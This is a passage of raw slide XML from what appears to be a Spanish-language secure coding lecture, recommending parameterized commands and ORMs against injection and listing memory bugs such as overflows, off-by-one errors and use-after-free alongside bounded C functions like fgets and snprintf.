                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="FFFFFF"/>
                        </a:buClr>
                        <a:buSzPts val="3200"/>
                        <a:buFont typeface="Radley"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" b="1" u="none" strike="noStrike" cap="none"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sym typeface="Radley"/>
                        </a:rPr>
                        <a:t>Command Interpreter</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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txBody>
                  <a:tcPr marL="45725" marR="45725" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="771" name="Google Shape;771;p56"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3298133280"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="775855" y="3873593"/>
          <a:ext cx="2875510" cy="2144125"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:noFill/>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1272513">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1602997">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="567075">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="FFFFFF"/>
                        </a:buClr>
                        <a:buSzPts val="2800"/>
                        <a:buFont typeface="Radley"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" u="none" strike="noStrike" cap="none"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sym typeface="Radley"/>
                        </a:rPr>
                        <a:t>Object</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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txBody>
                  <a:tcPr marL="45725" marR="45725" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="LID4096"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="788525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="FFFFFF"/>
                        </a:buClr>
                        <a:buSzPts val="2800"/>
                        <a:buFont typeface="Radley"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" u="none" strike="noStrike" cap="none">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                          <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                          <a:sym typeface="Radley"/>
                        </a:rPr>
                        <a:t>Field1</a:t>
                      </a:r>
                      <a:endParaRPr sz="120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txBody>
                  <a:tcPr marL="45725" marR="45725" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="FFFFFF"/>
                        </a:buClr>
                        <a:buSzPts val="2800"/>
                        <a:buFont typeface="Radley"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" u="none" strike="noStrike" cap="none"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sym typeface="Radley"/>
                        </a:rPr>
                        <a:t>Input</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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txBody>
                  <a:tcPr marL="45725" marR="45725" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="788525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="FFFFFF"/>
                        </a:buClr>
                        <a:buSzPts val="2800"/>
                        <a:buFont typeface="Radley"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" u="none" strike="noStrike" cap="none">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                          <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                          <a:sym typeface="Radley"/>
                        </a:rPr>
                        <a:t>Field2</a:t>
                      </a:r>
                      <a:endParaRPr sz="120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txBody>
                  <a:tcPr marL="45725" marR="45725" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="FFFFFF"/>
                        </a:buClr>
                        <a:buSzPts val="2800"/>
                        <a:buFont typeface="Radley"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" u="none" strike="noStrike" cap="none"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sym typeface="Radley"/>
                        </a:rPr>
                        <a:t>Input</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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txBody>
                  <a:tcPr marL="45725" marR="45725" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="772" name="Google Shape;772;p56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3840776" y="4496211"/>
            <a:ext cx="685221" cy="378948"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="0"/>
                  <a:pt x="10800" y="5400"/>
                  <a:pt x="10800" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="16200"/>
                  <a:pt x="16200" y="21600"/>
                  <a:pt x="21600" y="21600"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="53975" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:alpha val="99000"/>
              </a:schemeClr>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215472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CB310-B2D3-F228-3395-07C01C228E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78ACD5-4028-4597-9AC4-F359271CB091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="216038"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="5400" dirty="0"/>
              <a:t>En resumen…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F17CFCBE-964D-4E6E-57D3-54F16CF9E941}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1801412"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Comandos parametrizados </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>manejan las situaciones cuando caracteres peligrosos son necesarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-UY" sz="4000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> del tipo ORM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>previenen errores</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86858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E8049D4-C723-4C91-03A4-D0FF5CCA4811}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;783;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C6D857E-77C2-39CA-FC0E-74EA7730719C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="216038"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="44705"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="45675" tIns="45675" rIns="45675" bIns="45675"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s-UY" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Problemas con la Memoria</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Google Shape;784;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C02B8D1-B6D5-3F9B-97E4-57BE506F87B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1680795"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="44705"/>
            </a:srgbClr>
          </a:solid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254000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
            </a:pPr>
            <a:endParaRPr lang="es-UY" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-254000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> clásicos</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-254000">
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Cálculos incorrectos del tamaño del buffer</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-254000">
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Off </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>One</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-254000">
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Inyecciones de formato de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Strings</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-254000">
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Use-after-free</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383638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3786-4EA1-888D-BCB3-8A862AA862D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Funciones </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>más</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> seguras de memoria</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68FC3284-CC6E-19D0-C528-D2F28B1BC9CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3553691" y="1801412"/>
            <a:ext cx="8510153" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00B0F0"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1">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fgets</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dest_buff</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rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9300"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BUFF_SIZE</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rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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t>stdin</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endPar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p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00B0F0"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1">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snprintf</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dest_buff</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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9300"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BUFF_SIZE</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format, …); </a:t>
            </a:r>
            <a:endPar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p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00B0F0"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1">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strncpy</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dest_buff</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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src_buff</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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9300"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BUFF_SIZE</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endPar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p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00B0F0"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1">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strncmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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t>buff1</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t>buff2</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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9300"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BUFF_SIZE</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endPar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p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
